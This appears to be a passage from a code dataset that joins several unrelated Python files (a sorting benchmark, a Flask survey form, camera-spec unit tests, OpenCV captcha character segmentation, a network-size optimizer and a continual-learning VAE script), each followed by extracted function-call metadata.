([], {'return_value': '"""<testsuites><bla>"""'}), "(return_value='<testsuites><bla>')\n", (3791, 3825), False, 'from unittest.mock import Mock\n'), ((4049, 4175), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites> <testsuite name="Art" timestamp="2016-07-07T12:26:44"> </testsuite></testsuites>"""'}), '(return_value=\n \'<testsuites> <testsuite name="Art" timestamp="2016-07-07T12:26:44"> </testsuite></testsuites>\'\n )\n', (4053, 4175), False, 'from unittest.mock import Mock\n'), ((4924, 4970), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites></testsuites>"""'}), "(return_value='<testsuites></testsuites>')\n", (4928, 4970), False, 'from unittest.mock import Mock\n'), ((5218, 5287), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites><testsuite></testsuite></testsuites>"""'}), "(return_value='<testsuites><testsuite></testsuite></testsuites>')\n", (5222, 5287), False, 'from unittest.mock import Mock\n'), ((5788, 5880), 'hqlib.metric_source.JunitTestReport', 'JunitTestReport', ([], {'metric_source_url_re': '"""junit.xml$"""', 'metric_source_url_repl': '"""junit.html"""'}), "(metric_source_url_re='junit.xml$', metric_source_url_repl=\n 'junit.html')\n", (5803, 5880), False, 'from hqlib.metric_source import JunitTestReport\n'), ((4370, 4379), 'dateutil.tz.tzlocal', 'tzlocal', ([], {}), '()\n', (4377, 4379), False, 'from dateutil.tz import tzutc, tzlocal\n'), ((4350, 4357), 'dateutil.tz.tzutc', 'tzutc', ([], {}), '()\n', (4355, 4357), False, 'from dateutil.tz import tzutc, tzlocal\n')] |
sort_functions = [
builtinsort, # see implementation above
insertion_sort, # see [[Insertion sort]]
insertion_sort_lowb, # ''insertion_sort'', where sequential search is replaced
# by lower_bound() function
qsort, # see [[Quicksort]]
qsortranlc, # ''qsort'' with randomly choosen ''pivot''
# and the filtering via list comprehension
qsortranpart, # ''qsortranlc'' with filtering via ''partition'' function
qsortranpartis, # ''qsortranpart'', where for a small input sequence lengths
] # ''insertion_sort'' is called
if __name__=="__main__":
import sys
sys.setrecursionlimit(10000)
write_timings(npoints=100, maxN=1024, # 1 <= N <= 2**10 an input sequence length
sort_functions=sort_functions,
sequence_creators = (ones, range, shuffledrange))
plot_timings()
| [
"sys.setrecursionlimit"
] | [((719, 747), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10000)'], {}), '(10000)\n', (740, 747), False, 'import sys\n')] |
from flaskapp import app, db, mail
from flask import render_template, url_for
from flask import request, flash, redirect
# from flaskapp.model import User
from flaskapp.form import SurveyForm
from flask_mail import Message
@app.route('/', methods = ['POST', 'GET'])
def form():
form = SurveyForm()
if form.validate_on_submit():
# user = User(name=form.name.data, email=form.email.data)
# db.session.add(user)
# db.session.commit()
body = """
Thank you {} for filling the form!😊
""".format(form.name.data)
msg = Message(subject="survey form", sender='', recipients=[form.email.data], body=body)
mail.send(msg)
flash('Your feedback is successfully submitted!!', 'success')
return redirect(url_for('thank'))
return render_template('form.html', form=form)
@app.route('/thank')
def thank():
return render_template('thank.html')
| [
"flask.render_template",
"flaskapp.app.route",
"flask.flash",
"flask.url_for",
"flaskapp.form.SurveyForm",
"flask_mail.Message",
"flaskapp.mail.send"
] | [((232, 271), 'flaskapp.app.route', 'app.route', (['"""/"""'], {'methods': "['POST', 'GET']"}), "('/', methods=['POST', 'GET'])\n", (241, 271), False, 'from flaskapp import app, db, mail\n'), ((884, 903), 'flaskapp.app.route', 'app.route', (['"""/thank"""'], {}), "('/thank')\n", (893, 903), False, 'from flaskapp import app, db, mail\n'), ((299, 311), 'flaskapp.form.SurveyForm', 'SurveyForm', ([], {}), '()\n', (309, 311), False, 'from flaskapp.form import SurveyForm\n'), ((840, 879), 'flask.render_template', 'render_template', (['"""form.html"""'], {'form': 'form'}), "('form.html', form=form)\n", (855, 879), False, 'from flask import render_template, url_for\n'), ((930, 959), 'flask.render_template', 'render_template', (['"""thank.html"""'], {}), "('thank.html')\n", (945, 959), False, 'from flask import render_template, url_for\n'), ((595, 681), 'flask_mail.Message', 'Message', ([], {'subject': '"""survey form"""', 'sender': '""""""', 'recipients': '[form.email.data]', 'body': 'body'}), "(subject='survey form', sender='', recipients=[form.email.data],\n body=body)\n", (602, 681), False, 'from flask_mail import Message\n'), ((699, 713), 'flaskapp.mail.send', 'mail.send', (['msg'], {}), '(msg)\n', (708, 713), False, 'from flaskapp import app, db, mail\n'), ((723, 784), 'flask.flash', 'flash', (['"""Your feedback is successfully submitted!!"""', '"""success"""'], {}), "('Your feedback is successfully submitted!!', 'success')\n", (728, 784), False, 'from flask import request, flash, redirect\n'), ((810, 826), 'flask.url_for', 'url_for', (['"""thank"""'], {}), "('thank')\n", (817, 826), False, 'from flask import render_template, url_for\n')] |
import unittest
from kameramera import camera
class Camera(unittest.TestCase):
def setUp(self):
self.camera = camera.Camera(camera_id='canon_ae1')
def test_general_manufacturer(self):
self.assertEqual(self.camera.general.manufacturer, 'Canon')
def test_general_name(self):
self.assertEqual(self.camera.general.name, 'Canon AE-1')
def test_general_type(self):
self.assertEqual(self.camera.general.type, 'SLR')
def test_general_format(self):
self.assertEqual(self.camera.general.format, '24x35')
def test_general_made_in(self):
self.assertEqual(self.camera.general.made_in, 'Japan')
def test_general_date(self):
self.assertEqual(self.camera.general.date, '1976-1984')
def test_general_body_construction(self):
self.assertEqual(self.camera.general.body_construction, 'metal')
def test_general_mount_threads(self):
self.assertEqual(self.camera.general.mount_threads, '1/4"')
def test_general_dimension(self):
self.assertEqual(self.camera.general.dimension, '141x87x47.5 mm')
def test_general_weight(self):
self.assertEqual(self.camera.general.weight, '620g')
def test_optics_lenses(self):
self.assertEqual(self.camera.optics.lenses, 'interchangeable')
def test_optics_lenses_mount(self):
self.assertEqual(self.camera.optics.lenses_mount, 'Canon FD')
def test_sighting_type(self):
self.assertEqual(self.camera.sighting.type, 'fixed eye-level pentaprism')
def test_sighting_display(self):
self.assertEqual(self.camera.sighting.display, False)
def test_sighting_viewfinder_rangefinder(self):
self.assertEqual(self.camera.sighting.viewfinder.rangefinder,
['split_image', 'microprism'])
def test_sighting_viewfinder_aperture(self):
self.assertEqual(self.camera.sighting.viewfinder.aperture, True)
def test_sighting_viewfinder_exposure_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.exposure_indicator, True)
def test_sighting_viewfinder_flash_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.flash_indicator, True)
def test_focus_manual(self):
self.assertEqual(self.camera.focus.manual, True)
def test_focus_autofocus(self):
self.assertEqual(self.camera.focus.autofocus, False)
def test_focus_stabilization(self):
self.assertEqual(self.camera.focus.stabilization, False)
def test_focus_depth_of_field(self):
self.assertEqual(self.camera.focus.depth_of_field, True)
def test_shutter_type(self):
self.assertEqual(self.camera.shutter.type, None)
def test_shutter_shutter_speeds(self):
self.assertEqual(self.camera.shutter.shutter_speeds, [
'2',
'1',
'1/2',
'1/4',
'1/8',
'1/15',
'1/30',
'1/60',
'1/125',
'1/250',
'1/500',
'1/1000'
])
def test_shutter_pose(self):
self.assertEqual(self.camera.shutter.pose, 'B')
def test_shutter_self_timer(self):
self.assertEqual(self.camera.shutter.self_timer, 10)
def test_exposure_mode(self):
self.assertEqual(self.camera.exposure.mode, ['M','S'])
def test_exposure_correction(self):
self.assertEqual(self.camera.exposure.correction, 1.5)
def test_exposure_measure_type(self):
self.assertEqual(self.camera.exposure.measure.type, 'TTL')
def test_exposure_measure_light_sensor(self):
self.assertEqual(self.camera.exposure.measure.light_sensor,
'silicon photon cell')
def test_exposure_measure_metering_mode(self):
self.assertEqual(self.camera.exposure.measure.metering_mode,
'center-weighted average metering')
def test_exposure_measure_memory(self):
self.assertEqual(self.camera.exposure.measure.memory, True)
def test_film_format(self):
self.assertEqual(self.camera.film.format, 135)
def test_film_advance(self):
self.assertEqual(self.camera.film.advance, 'manual')
def test_film_frame_counter(self):
self.assertEqual(self.camera.film.frame_counter, True)
def test_film_film_speed(self):
self.assertEqual(self.camera.film.film_speed, [
25,
32,
40,
50,
64,
80,
100,
125,
160,
200,
250,
320,
400,
500,
640,
800,
1000,
1250,
1600,
2000,
2500,
3200
])
def test_flash_built_in(self):
self.assertEqual(self.camera.flash.built_in, False)
def test_flash_hot_shoe(self):
self.assertEqual(self.camera.flash.hot_shoe, True)
def test_flash_synchronization(self):
self.assertEqual(self.camera.flash.synchronization, '1/60')
def test_power_required(self):
self.assertEqual(self.camera.power.required, True)
def test_power_source_number(self):
self.assertEqual(self.camera.power.source[0].number, 1)
def test_power_source_voltage(self):
self.assertEqual(self.camera.power.source[0].voltage, 6)
def test_power_source_type(self):
self.assertEqual(self.camera.power.source[0].type, [
'alkaline-manganese',
'silver oxyde',
'lithium'
]) | [
"kameramera.camera.Camera"
] | [((125, 161), 'kameramera.camera.Camera', 'camera.Camera', ([], {'camera_id': '"""canon_ae1"""'}), "(camera_id='canon_ae1')\n", (138, 161), False, 'from kameramera import camera\n')] |
import matplotlib.pyplot as plt
import numpy as np
import math
import cv2
kernel = np.ones((3, 3), np.int8)
# 去除雜訊
def eraseImage (image):
return cv2.erode(image, kernel, iterations = 1)
# 模糊圖片
def blurImage (image):
return cv2.GaussianBlur(image, (5, 5), 0)
# 銳利化圖片
# threshold1,2,較小的值為作為偵測邊界的最小值
def edgedImage (image, threshold1 = 30, threshold2 = 150):
return cv2.Canny(image, threshold1, threshold2)
# 圖片膨脹
def dilateImage (image, level = (3, 3)):
level = np.ones(level, np.int8)
return cv2.dilate(image, level, iterations = 1)
# 獲得字元外盒
def getCharBox (image, minW = 15, minH = 15):
def setBoundingBox (contours):
box = []
for cnt in contours:
(x, y, w, h) = cv2.boundingRect(cnt)
# NOTE: 字元有一定大小,所以其盒子寬高也有基本門檻值
if w > minW and h > minH:
box.append((x, y, w, h))
# cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2) # 依照contour畫邊界
# cv2.imshow('test', image)
return box
def removeInnerBox (boxes):
# 對各個字元的外盒,依照 x 大小排列
boxes.sort(key = lambda e: e[0])
results = [boxes[0]]
for i in range(len(boxes) - 1):
x1, y1, w1, h1 = boxes[i]
x2, y2, w2, h2 = boxes[i+1]
if (x2 > x1 and x2 + w2 > x1 + w1):
results.append(boxes[i+1])
return results
contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
boundingBox = setBoundingBox(contours)
boundingBox = removeInnerBox(boundingBox)
return boundingBox
def showCharBox (image, boxes):
for x, y, w, h in boxes:
cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2) # 依照contour畫邊界
cv2.imshow('charBox', image)
cv2.waitKey(0)
def showCountour (contours):
row = 2
col = math.ceil(len(contours)/row)
for i, cnt in enumerate(contours, start = 1):
x = []
y = []
# plt.subplot(row, col, i)
for point in cnt:
x.append(point[0][0])
y.append(point[0][1])
plt.plot(x, y)
plt.show()
def resizeImage (image, charBox, size = (50, 50)):
results = []
for (x, y, w, h) in charBox:
char = image[y:y+h, x:x+w]
char = cv2.resize(char, size)
results.append(char)
return results
def diffPictures (picA, picB):
err = np.sum( (picA.astype('float') - picB.astype('float')) ** 2 )
err /= float(picA.shape[0] * picA.shape[1])
return err
if __name__ == '__main__':
pic = cv2.imread('../captcha_Images/0.png')
print(pic)
cv2.imshow('pic', pic)
cv2.waitKey(0)
erosion = eraseImage(pic)
blured = blurImage(erosion)
edged = edgedImage(blured)
dilated = dilateImage(edged)
charBox = getCharBox(dilated)
showCharBox(dilated, charBox)
dilated = dilateImage(edged, (4, 4))
chars = resizeImage(dilated, charBox)
# input("Press Enter to continue.")
# c = result[0][0][0][0]
# print(c)
# plt.plot(c)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"cv2.rectangle",
"numpy.ones",
"cv2.resize",
"cv2.erode",
"matplotlib.pyplot.plot",
"cv2.boundingRect",
"cv2.imshow",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.findContours",
"cv2.dilate",
"cv2.Canny",
"cv2.imread",
"cv2.GaussianBlur",
"matplotlib.pyplot.show"
] | [((84, 108), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.int8'], {}), '((3, 3), np.int8)\n', (91, 108), True, 'import numpy as np\n'), ((150, 188), 'cv2.erode', 'cv2.erode', (['image', 'kernel'], {'iterations': '(1)'}), '(image, kernel, iterations=1)\n', (159, 188), False, 'import cv2\n'), ((231, 265), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['image', '(5, 5)', '(0)'], {}), '(image, (5, 5), 0)\n', (247, 265), False, 'import cv2\n'), ((374, 414), 'cv2.Canny', 'cv2.Canny', (['image', 'threshold1', 'threshold2'], {}), '(image, threshold1, threshold2)\n', (383, 414), False, 'import cv2\n'), ((474, 497), 'numpy.ones', 'np.ones', (['level', 'np.int8'], {}), '(level, np.int8)\n', (481, 497), True, 'import numpy as np\n'), ((507, 545), 'cv2.dilate', 'cv2.dilate', (['image', 'level'], {'iterations': '(1)'}), '(image, level, iterations=1)\n', (517, 545), False, 'import cv2\n'), ((1298, 1361), 'cv2.findContours', 'cv2.findContours', (['image', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (1314, 1361), False, 'import cv2\n'), ((1940, 1950), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1948, 1950), True, 'import matplotlib.pyplot as plt\n'), ((2352, 2389), 'cv2.imread', 'cv2.imread', (['"""../captcha_Images/0.png"""'], {}), "('../captcha_Images/0.png')\n", (2362, 2389), False, 'import cv2\n'), ((2405, 2427), 'cv2.imshow', 'cv2.imshow', (['"""pic"""', 'pic'], {}), "('pic', pic)\n", (2415, 2427), False, 'import cv2\n'), ((2430, 2444), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2441, 2444), False, 'import cv2\n'), ((2803, 2817), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2814, 2817), False, 'import cv2\n'), ((2820, 2843), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2841, 2843), False, 'import cv2\n'), ((1532, 1594), 'cv2.rectangle', 'cv2.rectangle', (['image', '(x, y)', '(x + w, y + h)', '(127, 255, 0)', '(2)'], {}), '(image, (x, y), (x + w, y + h), (127, 255, 0), 2)\n', (1545, 1594), False, 'import cv2\n'), ((1615, 1643), 'cv2.imshow', 'cv2.imshow', (['"""charBox"""', 'image'], {}), "('charBox', image)\n", (1625, 1643), False, 'import cv2\n'), ((1648, 1662), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1659, 1662), False, 'import cv2\n'), ((1923, 1937), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {}), '(x, y)\n', (1931, 1937), True, 'import matplotlib.pyplot as plt\n'), ((2091, 2113), 'cv2.resize', 'cv2.resize', (['char', 'size'], {}), '(char, size)\n', (2101, 2113), False, 'import cv2\n'), ((697, 718), 'cv2.boundingRect', 'cv2.boundingRect', (['cnt'], {}), '(cnt)\n', (713, 718), False, 'import cv2\n')] |
import pprint
from nn_wtf.parameter_optimizers.neural_network_optimizer import NeuralNetworkOptimizer
__author__ = '<NAME> <<EMAIL>>'
class BruteForceOptimizer(NeuralNetworkOptimizer):
DEFAULT_LAYER_SIZES = (
(32, 48, 64), # (32, 48, 64, 80, 96, 128),
(32, 48, 64, 80, 96, 128),
(None, 16, 32, 48)
)
# self, tested_network, input_size, output_size, desired_training_precision,
def __init__(
self, tested_network, input_size, output_size, desired_training_precision,
layer_sizes=None, learning_rate=None, verbose=False, batch_size=100
):
super().__init__(
tested_network, input_size, output_size, desired_training_precision, verbose=verbose, batch_size=batch_size
)
self.learning_rate = learning_rate if learning_rate else self.DEFAULT_LEARNING_RATE
self.layer_sizes = self.DEFAULT_LAYER_SIZES if layer_sizes is None else layer_sizes
def best_parameters(self, data_sets, max_steps):
results = self.time_all_tested_geometries(data_sets, max_steps)
return results[0].optimization_parameters
def brute_force_optimal_network_geometry(self, data_sets, max_steps):
return self.best_parameters(data_sets, max_steps).geometry
def time_all_tested_geometries(self, data_sets, max_steps):
results = []
for geometry in self.get_network_geometries():
run_info = self.timed_run_training(
data_sets,
NeuralNetworkOptimizer.OptimizationParameters(geometry, self.learning_rate),
max_steps=max_steps
)
results.append(run_info)
results = sorted(results, key=lambda r: r.cpu_time)
if self.verbose: pprint.pprint(results, width=100)
return results
def get_network_geometries(self):
return ((l1, l2, l3)
for l1 in self.layer_sizes[0]
for l2 in self.layer_sizes[1] if l2 <= l1
for l3 in self.layer_sizes[2] if l3 is None or l3 <= l2)
def brute_force_optimize_learning_rate(self):
raise NotImplementedError()
| [
"pprint.pprint",
"nn_wtf.parameter_optimizers.neural_network_optimizer.NeuralNetworkOptimizer.OptimizationParameters"
] | [((1758, 1791), 'pprint.pprint', 'pprint.pprint', (['results'], {'width': '(100)'}), '(results, width=100)\n', (1771, 1791), False, 'import pprint\n'), ((1509, 1584), 'nn_wtf.parameter_optimizers.neural_network_optimizer.NeuralNetworkOptimizer.OptimizationParameters', 'NeuralNetworkOptimizer.OptimizationParameters', (['geometry', 'self.learning_rate'], {}), '(geometry, self.learning_rate)\n', (1554, 1584), False, 'from nn_wtf.parameter_optimizers.neural_network_optimizer import NeuralNetworkOptimizer\n')] |
import numpy as np
import tensorflow as tf
import sys, os
sys.path.extend(['alg/', 'models/'])
from visualisation import plot_images
from encoder_no_shared import encoder, recon
from utils import init_variables, save_params, load_params, load_data
from eval_test_ll import construct_eval_func
dimZ = 50
dimH = 500
n_channel = 128
batch_size = 50
lr = 1e-4
K_mc = 10
checkpoint = -1
def main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd):
# set up dataset specific stuff
from config import config
labels, n_iter, dimX, shape_high, ll = config(data_name, n_channel)
if data_name == 'mnist':
from mnist import load_mnist
if data_name == 'notmnist':
from notmnist import load_notmnist
# import functionalities
if method == 'onlinevi':
from bayesian_generator import generator_head, generator_shared, \
generator, construct_gen
from onlinevi import construct_optimizer, init_shared_prior, \
update_shared_prior, update_q_sigma
if method in ['ewc', 'noreg', 'laplace', 'si']:
from generator import generator_head, generator_shared, generator, construct_gen
if method in ['ewc', 'noreg']:
from vae_ewc import construct_optimizer, lowerbound
if method == 'ewc': from vae_ewc import update_ewc_loss, compute_fisher
if method == 'laplace':
from vae_laplace import construct_optimizer, lowerbound
from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum
if method == 'si':
from vae_si import construct_optimizer, lowerbound, update_si_reg
# then define model
n_layers_shared = 2
batch_size_ph = tf.placeholder(tf.int32, shape=(), name='batch_size')
dec_shared = generator_shared(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')
# initialise sessions
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
string = method
if method in ['ewc', 'laplace', 'si']:
string = string + '_lbd%.1f' % lbd
if method == 'onlinevi' and K_mc > 1:
string = string + '_K%d' % K_mc
path_name = data_name + '_%s/' % string
if not os.path.isdir('save/'):
os.mkdir('save/')
if not os.path.isdir('save/'+path_name):
os.mkdir('save/'+path_name)
print('create path save/' + path_name)
filename = 'save/' + path_name + 'checkpoint'
if checkpoint < 0:
print('training from scratch')
old_var_list = init_variables(sess)
else:
load_params(sess, filename, checkpoint)
checkpoint += 1
# visualise the samples
N_gen = 10**2
path = 'figs/' + path_name
if not os.path.isdir('figs/'):
os.mkdir('figs/')
if not os.path.isdir(path):
os.mkdir(path)
print('create path ' + path)
X_ph = tf.placeholder(tf.float32, shape=(batch_size, dimX), name = 'x_ph')
# now start fitting
N_task = len(labels)
gen_ops = []
X_valid_list = []
X_test_list = []
eval_func_list = []
result_list = []
if method == 'onlinevi':
shared_prior_params = init_shared_prior()
if method in ['ewc', 'noreg']:
ewc_loss = 0.0
if method == 'laplace':
F_accum = init_fisher_accum()
laplace_loss = 0.0
if method == 'si':
old_params_shared = None
si_reg = None
n_layers_head = 2
n_layers_enc = n_layers_shared + n_layers_head - 1
for task in range(1, N_task+1):
# first load data
if data_name == 'mnist':
X_train, X_test, _, _ = load_mnist(digits = labels[task-1], conv = False)
if data_name == 'notmnist':
X_train, X_test, _, _ = load_notmnist(digits = labels[task-1], conv = False)
N_train = int(X_train.shape[0] * 0.9)
X_valid_list.append(X_train[N_train:])
X_train = X_train[:N_train]
X_test_list.append(X_test)
# define the head net and the generator ops
dec = generator(generator_head(dimZ, dimH, n_layers_head, 'gen_%d' % task), dec_shared)
enc = encoder(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)
gen_ops.append(construct_gen(dec, dimZ, sampling=False)(N_gen))
print('construct eval function...')
eval_func_list.append(construct_eval_func(X_ph, enc, dec, ll, \
batch_size_ph, K = 100, sample_W = False))
# then construct loss func and fit func
print('construct fit function...')
if method == 'onlinevi':
fit = construct_optimizer(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph, \
shared_prior_params, task, K_mc)
if method in ['ewc', 'noreg']:
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)
if method == 'ewc':
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'laplace':
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'si':
bound = lowerbound(X_ph, enc, dec, ll)
fit, shared_var_list = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0],
si_reg, old_params_shared, lbd)
if old_params_shared is None:
old_params_shared = sess.run(shared_var_list)
# initialise all the uninitialised stuff
old_var_list = init_variables(sess, old_var_list)
# start training for each task
if method == 'si':
new_params_shared, w_params_shared = fit(sess, X_train, n_iter, lr)
else:
fit(sess, X_train, n_iter, lr)
# plot samples
x_gen_list = sess.run(gen_ops, feed_dict={batch_size_ph: N_gen})
for i in range(len(x_gen_list)):
plot_images(x_gen_list[i], shape_high, path, \
data_name+'_gen_task%d_%d' % (task, i+1))
x_list = [x_gen_list[i][:1] for i in range(len(x_gen_list))]
x_list = np.concatenate(x_list, 0)
tmp = np.zeros([10, dimX])
tmp[:task] = x_list
if task == 1:
x_gen_all = tmp
else:
x_gen_all = np.concatenate([x_gen_all, tmp], 0)
# print test-ll on all tasks
tmp_list = []
for i in range(len(eval_func_list)):
print('task %d' % (i+1), end=' ')
test_ll = eval_func_list[i](sess, X_valid_list[i])
tmp_list.append(test_ll)
result_list.append(tmp_list)
# save param values
save_params(sess, filename, checkpoint)
checkpoint += 1
# update regularisers/priors
if method == 'ewc':
# update EWC loss
print('update ewc loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
ewc_loss = update_ewc_loss(sess, ewc_loss, var_list, fisher, lbd, X_batch)
if method == 'laplace':
# update EWC loss
print('update laplace loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
laplace_loss, F_accum = update_laplace_loss(sess, F_accum, var_list, fisher, lbd, X_batch)
if method == 'onlinevi':
# update prior
print('update prior...')
shared_prior_params = update_shared_prior(sess, shared_prior_params)
# reset the variance of q
update_q_sigma(sess)
if method == 'si':
# update regularisers/priors
print('update SI big omega matrices...')
si_reg, _ = update_si_reg(sess, si_reg, new_params_shared, \
old_params_shared, w_params_shared)
old_params_shared = new_params_shared
plot_images(x_gen_all, shape_high, path, data_name+'_gen_all')
for i in range(len(result_list)):
print(result_list[i])
# save results
if not os.path.isdir("results/"):
os.mkdir("results/")
fname = 'results/' + data_name + '_%s.pkl' % string
import pickle
with open(fname, 'wb') as f:
pickle.dump(result_list, f)
print('test-ll results saved in', fname)
if __name__ == '__main__':
data_name = str(sys.argv[1])
method = str(sys.argv[2])
assert method in ['noreg', 'laplace', 'ewc', 'si', 'onlinevi']
if method == 'onlinevi':
lbd = 1.0 # some placeholder, doesn't matter
else:
lbd = float(sys.argv[3])
main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd)
| [
"eval_test_ll.construct_eval_func",
"generator.construct_gen",
"notmnist.load_notmnist",
"vae_laplace.init_fisher_accum",
"visualisation.plot_images",
"vae_si.update_si_reg",
"tensorflow.placeholder",
"tensorflow.Session",
"utils.load_params",
"os.path.isdir",
"sys.path.extend",
"os.mkdir",
... | [((58, 94), 'sys.path.extend', 'sys.path.extend', (["['alg/', 'models/']"], {}), "(['alg/', 'models/'])\n", (73, 94), False, 'import sys, os\n'), ((580, 608), 'config.config', 'config', (['data_name', 'n_channel'], {}), '(data_name, n_channel)\n', (586, 608), False, 'from config import config\n'), ((1757, 1810), 'tensorflow.placeholder', 'tf.placeholder', (['tf.int32'], {'shape': '()', 'name': '"""batch_size"""'}), "(tf.int32, shape=(), name='batch_size')\n", (1771, 1810), True, 'import tensorflow as tf\n'), ((1828, 1891), 'generator.generator_shared', 'generator_shared', (['dimX', 'dimH', 'n_layers_shared', '"""sigmoid"""', '"""gen"""'], {}), "(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')\n", (1844, 1891), False, 'from generator import generator_head, generator_shared, generator, construct_gen\n'), ((1932, 1948), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1946, 1948), True, 'import tensorflow as tf\n'), ((2003, 2028), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (2013, 2028), True, 'import tensorflow as tf\n'), ((2925, 2990), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '(batch_size, dimX)', 'name': '"""x_ph"""'}), "(tf.float32, shape=(batch_size, dimX), name='x_ph')\n", (2939, 2990), True, 'import tensorflow as tf\n'), ((8364, 8428), 'visualisation.plot_images', 'plot_images', (['x_gen_all', 'shape_high', 'path', "(data_name + '_gen_all')"], {}), "(x_gen_all, shape_high, path, data_name + '_gen_all')\n", (8375, 8428), False, 'from visualisation import plot_images\n'), ((2272, 2294), 'os.path.isdir', 'os.path.isdir', (['"""save/"""'], {}), "('save/')\n", (2285, 2294), False, 'import sys, os\n'), ((2304, 2321), 'os.mkdir', 'os.mkdir', (['"""save/"""'], {}), "('save/')\n", (2312, 2321), False, 'import sys, os\n'), ((2333, 2367), 'os.path.isdir', 'os.path.isdir', (["('save/' + path_name)"], {}), "('save/' + path_name)\n", (2346, 2367), False, 'import sys, os\n'), ((2375, 2404), 'os.mkdir', 'os.mkdir', (["('save/' + path_name)"], {}), "('save/' + path_name)\n", (2383, 2404), False, 'import sys, os\n'), ((2585, 2605), 'utils.init_variables', 'init_variables', (['sess'], {}), '(sess)\n', (2599, 2605), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((2624, 2663), 'utils.load_params', 'load_params', (['sess', 'filename', 'checkpoint'], {}), '(sess, filename, checkpoint)\n', (2635, 2663), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((2772, 2794), 'os.path.isdir', 'os.path.isdir', (['"""figs/"""'], {}), "('figs/')\n", (2785, 2794), False, 'import sys, os\n'), ((2804, 2821), 'os.mkdir', 'os.mkdir', (['"""figs/"""'], {}), "('figs/')\n", (2812, 2821), False, 'import sys, os\n'), ((2833, 2852), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (2846, 2852), False, 'import sys, os\n'), ((2862, 2876), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (2870, 2876), False, 'import sys, os\n'), ((3207, 3226), 'onlinevi.init_shared_prior', 'init_shared_prior', ([], {}), '()\n', (3224, 3226), False, 'from onlinevi import construct_optimizer, init_shared_prior, update_shared_prior, update_q_sigma\n'), ((3331, 3350), 'vae_laplace.init_fisher_accum', 'init_fisher_accum', ([], {}), '()\n', (3348, 3350), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n'), ((4175, 4231), 'encoder_no_shared.encoder', 'encoder', (['dimX', 'dimH', 'dimZ', 'n_layers_enc', "('enc_%d' % task)"], {}), "(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)\n", (4182, 4231), False, 'from encoder_no_shared import encoder, recon\n'), ((5870, 5904), 'utils.init_variables', 'init_variables', (['sess', 'old_var_list'], {}), '(sess, old_var_list)\n', (5884, 5904), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((6499, 6524), 'numpy.concatenate', 'np.concatenate', (['x_list', '(0)'], {}), '(x_list, 0)\n', (6513, 6524), True, 'import numpy as np\n'), ((6539, 6559), 'numpy.zeros', 'np.zeros', (['[10, dimX]'], {}), '([10, dimX])\n', (6547, 6559), True, 'import numpy as np\n'), ((7080, 7119), 'utils.save_params', 'save_params', (['sess', 'filename', 'checkpoint'], {}), '(sess, filename, checkpoint)\n', (7091, 7119), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((8539, 8564), 'os.path.isdir', 'os.path.isdir', (['"""results/"""'], {}), "('results/')\n", (8552, 8564), False, 'import sys, os\n'), ((8574, 8594), 'os.mkdir', 'os.mkdir', (['"""results/"""'], {}), "('results/')\n", (8582, 8594), False, 'import sys, os\n'), ((8711, 8738), 'pickle.dump', 'pickle.dump', (['result_list', 'f'], {}), '(result_list, f)\n', (8722, 8738), False, 'import pickle\n'), ((3665, 3712), 'mnist.load_mnist', 'load_mnist', ([], {'digits': 'labels[task - 1]', 'conv': '(False)'}), '(digits=labels[task - 1], conv=False)\n', (3675, 3712), False, 'from mnist import load_mnist\n'), ((3787, 3837), 'notmnist.load_notmnist', 'load_notmnist', ([], {'digits': 'labels[task - 1]', 'conv': '(False)'}), 